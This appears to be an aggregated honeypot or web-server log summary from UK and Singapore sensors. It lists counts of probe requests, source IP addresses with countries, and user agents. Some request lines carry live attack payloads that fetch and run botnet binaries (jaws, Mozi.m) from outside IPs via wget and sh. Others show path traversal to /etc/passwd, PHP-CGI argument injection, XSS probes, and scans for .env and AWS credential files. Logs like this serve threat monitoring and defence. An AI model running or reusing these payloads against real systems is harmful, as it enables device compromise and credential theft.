1 GET /scripts/wjaLeDLabxj1.pl HTTP/1.1
1 GET /scripts/wjaLeDLabxj1.sh HTTP/1.1
1 GET /scripts/wjaLeDLabxj1.shtml HTTP/1.1
1 GET /search/results.stm HTTP/1.1
1 GET /search?NS-query-pat=../../../../../../../../../etc/passwd HTTP/1.1
1 GET /search?NS-query-pat=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini HTTP/1.1
1 GET /securecgi-bin/CSUserCGI.exe?Init+0 HTTP/1.1
1 GET /securecgi-bin/CSUserCGI.exe?ver HTTP/1.1
1 GET /self_upgrade.html HTTP/1.1
2 GET /server-info HTTP/1.1
2 GET /server-status HTTP/1.1
1 GET /servlet/SnoopServlet/ HTTP/1.1
1 GET /servlet/UDataArea?plugin=com.dell.oma.webplugins.AboutWebPlugin HTTP/1.1
1 GET /servlet/admin?category=server&method=listAll&Authorization=Digest+username%3D%22admin%22%2C+response%3D%22ae9f86d6beaa3f9ecb9a5b7e072a4138%22%2C+nonce%3D%222b089ba7985a883ab2eddcd3539a6c94%22%2C+realm%3D%22adminRealm%22%2C+uri%3D%22%2Fservlet%2Fadmin%22&service= HTTP/1.0
1 GET /servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5cglobal.asa HTTP/1.1
1 GET /servlet/com.newatlanta.servletexec.JSP10Servlet HTTP/1.1
1 GET /servlet/snoop/ HTTP/1.1
1 GET /servlet/snoopservlet/ HTTP/1.1
1 GET /servlet/webacc?User.lang=<script>foo</script> HTTP/1.1
1 GET /servlet/webacc?error=webacc HTTP/1.1
3 GET /session_login.cgi HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /setup/setup-/../../log.jsp?log=info&mode=asc&lines=10 HTTP/1.1
1 GET /setup HTTP/1.1
1 GET /sgdadmin/faces/jsp/Version.jsp HTTP/1.1
1 GET /sgms/login HTTP/1.1
1 GET /shared/userlogin.php HTTP/1.1
3 GET /shell?cd+/tmp;rm+-rf+*;wget+ 103.188.166.164/jaws;sh+/tmp/jaws
2 GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.213.3/bins/UnHAnaAW.arm;chmod+777+/tmp/UnHAnaAW.arm;sh+/tmp/UnHAnaAW.arm
1 GET /shell?cd+/tmp;rm+-rf+*;wget+167[.]71[.]210[.]63/jaws;sh+/tmp/jaws HTTP/1.1
1 GET /shop/wp-includes/wlwmanifest.xml HTTP/1.1
3 GET /show_bug.cgi HTTP/1.1
1 GET /site/wp-includes/wlwmanifest.xml HTTP/1.1
2 GET /sitemap.xml HTTP/1.1
1 GET /sitemap/sitemap.xml HTTP/1.1
1 GET /smadmr5.nsf HTTP/1.1
1 GET /smconf.nsf HTTP/1.1
1 GET /smency.nsf HTTP/1.1
1 GET /smftypes.nsf HTTP/1.1
1 GET /smhelp.nsf HTTP/1.1
1 GET /smmsg.nsf HTTP/1.1
1 GET /smquar.nsf HTTP/1.1
1 GET /smsmvlog.nsf HTTP/1.1
1 GET /smtime.nsf HTTP/1.1
1 GET /snmx-cgi/fxm.exe HTTP/1.1
1 GET /snoop/ HTTP/1.1
1 GET /snoopservlet/ HTTP/1.1
1 GET /solr/# HTTP/1.1
1 GET /someunexistantantsutff.exe HTTP/1.1
1 GET /someunexistantantsutff7389352011598381852.html HTTP/1.1
1 GET /spotfire/about.jsp HTTP/1.1
1 GET /spywall/login.php HTTP/1.1
1 GET /ssp// HTTP/1.1
1 GET /start.js HTTP/1.1
1 GET /status.php3 HTTP/1.1
1 GET /status.xsl. HTTP/1.1
1 GET /stcenter.nsf HTTP/1.1
1 GET /stream/0 HTTP/1.1
1 GET /stronghold-info HTTP/1.1
1 GET /stronghold-status HTTP/1.1
1 GET /struts/webconsole.html HTTP/1.1
1 GET /sws/data/sws_data.js HTTP/1.1
1 GET /swvm/ConsoleContainer.jsp HTTP/1.1
1 GET /syslog.htm HTTP/1.1
1 GET /system.xml HTTP/1.1
1 GET /system/console?version=1.5 HTTP/1.1
2 GET /system/login HTTP/1.1
1 GET /tarantella/cgi-bin/secure/ttawlogin.cgi/?action=bootstrap HTTP/1.1
3 GET /test.cgi HTTP/1.1
1 GET /test.js HTTP/1.1
1 GET /test/wp-includes/wlwmanifest.xml HTTP/1.1
3 GET /test HTTP/1.1
1 GET /this_page_should_not_exist.htm HTTP/1.1
1 GET /this_server/all_settings.shtml HTTP/1.1
1 GET /tightvnc-jviewer.jar HTTP/1.1
1 GET /tmui/ HTTP/1.1
1 GET /tos/ HTTP/1.1
1 GET /tos/index.php?user/login HTTP/1.1
1 GET /trace.axd HTTP/1.1
1 GET /trc HTTP/1.1
1 GET /triton-help/en/first.htm HTTP/1.1
1 GET /tsp// HTTP/1.1
3 GET /ucsm/isSamInstalled.cgi HTTP/1.1
1 GET /uddi/default.aspx HTTP/1.1
1 GET /uddipublic/default.aspx HTTP/1.1
2 GET /ui/ HTTP/1.1
1 GET /ui/faces/Login.xhtml HTTP/1.1
1 GET /ui/login.action HTTP/1.1
1 GET /ui/login/ HTTP/1.1
1 GET /unified-console.html HTTP/1.1
1 GET /update.php?op=info HTTP/1.1
1 GET /upnp/BasicDevice.xml HTTP/1.1
1 GET /usage/ HTTP/1.1
1 GET /user_settings.cfg HTTP/1.1
1 GET /userportal/webpages/myaccount/login.jsp HTTP/1.1
1 GET /users/sign_in HTTP/1.1
1 GET /v2.0/environments/83.118.68.34.bc.googleusercontent.com HTTP/1.1
1 GET /version HTTP/1.1
1 GET /view.html HTTP/1.1
1 GET /view/hsrindex.shtml HTTP/1.1
1 GET /view/view.shtml HTTP/1.1
1 GET /vncviewer.jar HTTP/1.1
1 GET /vpn/ HTTP/1.1
1 GET /vsapres/web20/core/login.aspx HTTP/1.1
1 GET /vsmc.html HTTP/1.1
1 GET /wavemaster.internal HTTP/1.1
1 GET /wcd/system.xml HTTP/1.1
1 GET /web-console/ServerInfo.jsp%00 HTTP/1.1
1 GET /web-console/ServerInfo.jsp HTTP/1.1
1 GET /web-determinations/?CookieSet=true HTTP/1.1
1 GET /web.config HTTP/1.1
1 GET /web/#/login HTTP/1.1
1 GET /web/ HTTP/1.1
1 GET /web/signin HTTP/1.1
1 GET /web/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /webalizer/ HTTP/1.1
1 GET /webapp/js/UI_String.en-US.js HTTP/1.1
1 GET /webapps/login/index.html HTTP/1.1
1 GET /webconsole/webpages/login.jsp HTTP/1.1
1 GET /webct/about.jsp HTTP/1.1
1 GET /webhost HTTP/1.1
1 GET /webman/info.cgi?host= HTTP/1.1
3 GET /whois.cgi HTTP/1.1
1 GET /wjaLeDLabxj1.asp HTTP/1.1
1 GET /wjaLeDLabxj1.cfm HTTP/1.1
1 GET /wjaLeDLabxj1.cgi HTTP/1.1
1 GET /wjaLeDLabxj1.html HTTP/1.1
1 GET /wjaLeDLabxj1.inc HTTP/1.1
1 GET /wjaLeDLabxj1.php3 HTTP/1.1
1 GET /wjaLeDLabxj1.php HTTP/1.1
1 GET /wjaLeDLabxj1.pl HTTP/1.1
1 GET /wjaLeDLabxj1.sh HTTP/1.1
1 GET /wjaLeDLabxj1.shtml HTTP/1.1
1 GET /wls-wsat/CoordinatorPortType HTTP/1.1
1 GET /wls_utc/ HTTP/1.1
1 GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1
3 GET /wp-login.php HTTP/1.1
1 GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wrcontrollite.ssi HTTP/1.1
1 GET /ws_utc/login.do HTTP/1.1
3 GET /wwwadmin.cgi HTTP/1.1
3 GET /wwwboard.cgi HTTP/1.1
1 GET /x1WNU9no.aspx HTTP/1.1
3 GET /xampp/cgi.cgi HTTP/1.1
1 GET /xampp/index.php HTTP/1.1
1 GET /xmldata?item=All HTTP/1.1
1 GET /xmldata?item=all HTTP/1.1
1 GET /xmlrpc.php?rsd HTTP/1.1
1 GET /xsql/demo/airport/airport.xsql?xml-stylesheet=none HTTP/1.1
1 GET /~nobody/etc/passwd HTTP/1.1
1 GET 1684316580:@34.68.118.83/
1 GET 1684316580:@34.68.118.83/ HTTP/1.1
1 GET <meta%20http-equiv=Set-Cookie%20content=%22testzbdm=9118%22> HTTP/1.1
1 GET <script>document.cookie=%22testzbdm=9118;%22</script> HTTP/1.1
1 GET c:\\boot.ini HTTP/1.1
1 GET http[:]//83[.]118[.]68[.]34.bc.googleusercontent.com/authentication/login/ HTTP/1.1
1 GET http[:]//rfi[.]nessus[.]org/check_proxy.html HTTP/1.0
1 HEAD / HTTP/1.1\n
1 HEAD /someunexistantstuff.exe HTTP/1.1
1 HEAD /someunexistantstuff11014434251802500318.html HTTP/1.1
1 NESSUS / HTTP/1.0
2 OPTIONS * HTTP/1.1
1 OPTIONS / HTTP/1.1
1 POST /%70%68%70%70%61%74%68/%70%68%70?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%6e HTTP/1.1
1 POST /FormHandler.cgi HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /av-centerd HTTP/1.1
1 POST /blazeds/messagebroker/http HTTP/1.1
6 POST /boaform/admin/formLogin HTTP/1.1
1 POST /boaform/formPing HTTP/1.1
1 POST /cgi-bin/file_transfer.cgi HTTP/1.1
1 POST /cgi-bin/mainfunction.cgi HTTP/1.1
1 POST /cn/cmd HTTP/1.1
1 POST /dvr/cmd HTTP/1.1
1 POST /flex2gateway/http HTTP/1.1
1 POST /glpi/vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1
1 POST /index.php?s=xxxx HTTP/1.1
1 POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
1 POST /jsonrpc HTTP/1.1
1 POST /lcds/messagebroker/http HTTP/1.1
1 POST /messagebroker/http HTTP/1.1
1 POST /mgmt/tm/util/bash HTTP/1.1
1 POST /perl/ HTTP/1.1
1 POST /sawmill6cl.exe HTTP/1.1
1 POST /sawmillcl.exe HTTP/1.1
1 POST /server/service/smsConfigServiceHttpInvoker HTTP/1.1
6 POST /servlet/GetProductVersion HTTP/1.1
1 POST /something/maybe/ping HTTP/1.1
1 POST /spipe?Source=nessus HTTP/1.0
1 POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1
1 POST /webui/apps/sdcss HTTP/1.1
1 POST http[:]//127[.]0[.]0[.]1/iControl/iControlPortal.cgi HTTP/1.1
3 PRI * HTTP/2.0
1 PROPFIND / HTTP/1.1
1 PUT /qIgmFGdCUSK2 HTTP/1.1
1 SEARCH / HTTP/1.1
1 Secure * Secure-HTTP/1.4
1 TRACE /Nessus483695.html HTTP/1.1
1 XQPUMG / HTTP/1.1
1 some invalid request
1 t3 12.2.1\n
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
2 34.95.59.34 United States
2 34.148.48.252 United States
2 45.33.80.243 United States
1 45.67.35.164 Russia
1 45.79.181.251 United States
5 45.95.169.240 Croatia
1 45.118.133.122 Japan
1 45.186.200.243 Venezuela
2 45.227.254.55 Belize
16 51.79.29.48 Canada
6 54.36.115.221 France
2 65.49.20.69 United States
1 66.175.213.4 United States
1 87.121.221.49 Bulgaria
2 90.151.171.108 Russia
1 105.23.243.94 South Africa
2 109.237.97.180 Russia
2 109.237.98.226 Russia
12 118.123.105.86 China
1 129.114.108.70 United States
1 144.126.226.94 United States
2 152.89.196.144 Russia
1 159.89.44.122 United States
2 162.142.125.214 United States
2 163.123.142.146 United States
2 167.94.146.58 United States
1 167.172.249.105 United States
1 172.104.11.34 United States
1 172.104.11.46 United States
2 172.104.11.51 United States
1 172.105.128.11 United States
1 172.105.128.12 United States
1 172.105.128.13 United States
2 179.43.177.243 Panama
1 185.141.110.139 Turkey
1 185.197.195.126 Germany
1 192.155.90.118 United States
1 192.241.192.34 United States
1 192.241.200.110 United States
1 192.241.216.10 United States
1 198.199.116.108 United States
1 198.235.24.146 United States
1 205.210.31.175 United States

UserAgent一覧

件数 UserAgent
40 -
4 Abcd
1 Hello, world
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15
1 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
2 Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0 (+https[:]//best-proxies.ru/faq/#from)
26 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0
6 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
4 Mozilla/5.0 zgrab/0.x
1 python-requests/2.27.1

リクエスト内容一覧

件数 Method Request Protocol
1 MGLNDD_132.145.66.34_80\n
2 \x03
2 \x16\x03\x01\x01H\x01
1 \x16\x03\x01\x01\x9e\x01
2 \x16\x03\x01\x01\xa8\x01
1 \x16\x03\x01\x01\xb5\x01
1 \x16\x03\x01\x01\xfc\x01
18 \x16\x03\x01
1 \x16\x03\x02\x01\x9b\x01
1 \x16\x03\x03\x01I\x01
1 \x16\x03\x03\x01W\x01
1 \x16\x03\x03\x01\x8e\x01
1 \x16\x03\x03\x01\x9a\x01
2 \x16\x03\x03\x01\xa6\x01
1 CONNECT v4[.]ident[.]me:443 HTTP/1.1
26 GET /.env HTTP/1.1
1 GET /1.php HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0
1 GET /cdn-cgi/trace HTTP/1.1
1 GET /druid/index.html HTTP/1.1
4 GET /favicon.ico HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /manager/text/list HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+193[.]23[.]161[.]113/jaws;sh+/tmp/jaws HTTP/1.1
1 GET http[:]//v4[.]ident[.]me?Z72612114222Q1 HTTP/1.1
2 OPTIONS / HTTP/1.0
6 POST /boaform/admin/formLogin HTTP/1.1
2 POST /cn/cmd HTTP/1.1
2 POST /dvr/cmd HTTP/1.1
1 POST /mgmt/tm/util/bash HTTP/1.1
2 PRI * HTTP/2.0
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
1 5.188.210.227 Russia
1 20.68.19.158 United States
2 34.32.207.123 United States
19 34.228.75.133 United States
1 45.33.80.243 United States
1 45.56.108.128 United States
1 45.79.181.104 United States
1 45.93.201.57 Russia
5 45.95.169.240 Croatia
2 45.128.232.62 Bulgaria
1 45.227.254.55 Belize
21 54.36.115.221 France
6 54.37.79.75 France
1 59.40.81.136 China
2 64.62.197.123 United States
7 64.225.76.191 United States
1 66.240.205.34 United States
1 66.249.65.71 United States
3 87.121.221.49 Bulgaria
1 95.38.71.4 Iran
1 95.214.27.53 Bulgaria
1 103.89.88.147 Vietnam
1 104.236.194.200 United States
1 107.170.224.13 United States
1 107.170.237.22 United States
2 109.237.97.180 Russia
2 109.237.98.226 Russia
2 113.30.148.166 India
8 142.93.190.138 United States
1 144.126.194.139 United States
1 149.129.50.37 Singapore
2 152.89.196.144 Russia
2 162.142.125.216 United States
2 167.94.146.58 United States
1 170.253.10.250 Spain
1 171.22.30.127 Bulgaria
2 172.104.11.46 United States
1 172.104.11.51 United States
2 172.105.128.11 United States
4 172.105.128.13 United States
1 188.166.82.10 United States
1 192.155.90.118 United States
1 194.165.16.73 Panama
1 195.238.122.25 Israel
1 197.40.230.217 Egypt
1 198.199.109.203 United States
1 198.235.24.159 United States
1 198.235.24.201 United States
1 205.210.31.146 United States
1 222.139.226.23 China

UserAgent一覧

件数 UserAgent
38 -
4 Abcd
1 Mozilla/4.08 [en] (WinNT; U)
2 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
7 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
34 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0
6 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
19 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
2 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
1 Mozilla/5.0 (compatible; Googlebot/2.1; +http[:]//www[.]google[.]com/bot.html)
3 Mozilla/5.0 zgrab/0.x
2 Mozilla/5.0

リクエスト内容一覧

件数 Method Request Protocol
2 -
1 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
1 Gh0st\xad
1 MGLNDD_13.67.44.234_80
2 \x03
2 \x16\x03\x01\x01H\x01
1 \x16\x03\x01\x01\xfb\x01
22 \x16\x03\x01
1 \x16\x03\x03\x01\x8e\x01
1 GET /.aws/credentials HTTP/1.1
1 GET /.env.bak HTTP/1.1
34 GET /.env HTTP/1.1
3 GET /.git/config HTTP/1.1
2 GET /1.php HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /_profiler/phpinfo HTTP/1.1
1 GET /_wpeprivate/config.json HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /admin/.env HTTP/1.1
1 GET /api/.env HTTP/1.1
1 GET /aws.yml HTTP/1.1
1 GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0
2 GET /client/get_targets HTTP/1.1
1 GET /config.js HTTP/1.1
1 GET /config/aws.yml HTTP/1.1
1 GET /dashboard/phpinfo.php HTTP/1.1
1 GET /druid/index.html HTTP/1.1
6 GET /favicon.ico HTTP/1.1
2 GET /geoip/ HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
1 GET /info.json HTTP/1.1
1 GET /info.php HTTP/1.1
1 GET /laravel/.env HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /php-info HTTP/1.1
1 GET /phpinfo.php HTTP/1.1
1 GET /phpinfo HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+ 103.188.166.164/jaws;sh+/tmp/jaws
1 GET /systembc/password.php HTTP/1.0
1 GET /test.php HTTP/1.1
2 GET /upl.php HTTP/1.1
1 GET http[:]//5[.]188[.]210[.]227/echo.php HTTP/1.1
1 GET http[:]//www[.]1ucn[.]com/proxychecker/index.php HTTP/1.1
1 HEAD / HTTP/1.1
1 OPTIONS / HTTP/1.0
6 POST /boaform/admin/formLogin HTTP/1.1
2 POST /cn/cmd HTTP/1.1
2 POST /dvr/cmd HTTP/1.1
2 PRI * HTTP/2.0